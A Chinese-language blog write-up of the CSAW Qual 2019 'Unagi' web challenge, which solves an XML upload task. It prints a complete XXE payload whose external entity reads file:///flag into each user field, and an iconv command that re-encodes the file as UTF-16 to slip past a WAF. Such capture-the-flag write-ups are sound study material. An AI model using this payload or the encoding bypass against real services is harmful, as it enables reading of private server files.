[CSAWQual 2019]Web_Unagi 1

xml,文件上传

打开题目后可以看到明显的文件上传，从here中可以看到一些提示

已经把xml喂到嘴里了就差直接给我payload了

从这里可以看到他给的一些数据内容，我们可以大概看到有什么数据存放在里面，直接构造payload

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>&xxe;</username>
        <password>&xxe;</password>
        <name>&xxe;</name>
        <email>&xxe;</email>  
        <group>&xxe;</group>
        <intro>&xxe;</intro>
    </user>
</users>

直接传发现没法传，很明显是碰见waf了，这里我去找到了xxe的waf：https://xz.aliyun.com/t/4059?time__1311=n4%2Bxni0QG%3DoCuRgDlxGObCDOYa6dxAKDC8n0eD
这里我用的是utf-8转码为utf-16绕过的

iconv -f utf8 -t utf-16 2.xml>1.xml

即可得到转码后的文件直接上传
直接上传之后发现可以得到flag

posted @ 2024-07-15 15:13 z3ghxxx 阅读(210) 评论(0) 收藏举报

刷新页面返回顶部

z3ghxxx

[CSAWQual 2019]Web_Unagi 1

xml,文件上传

公告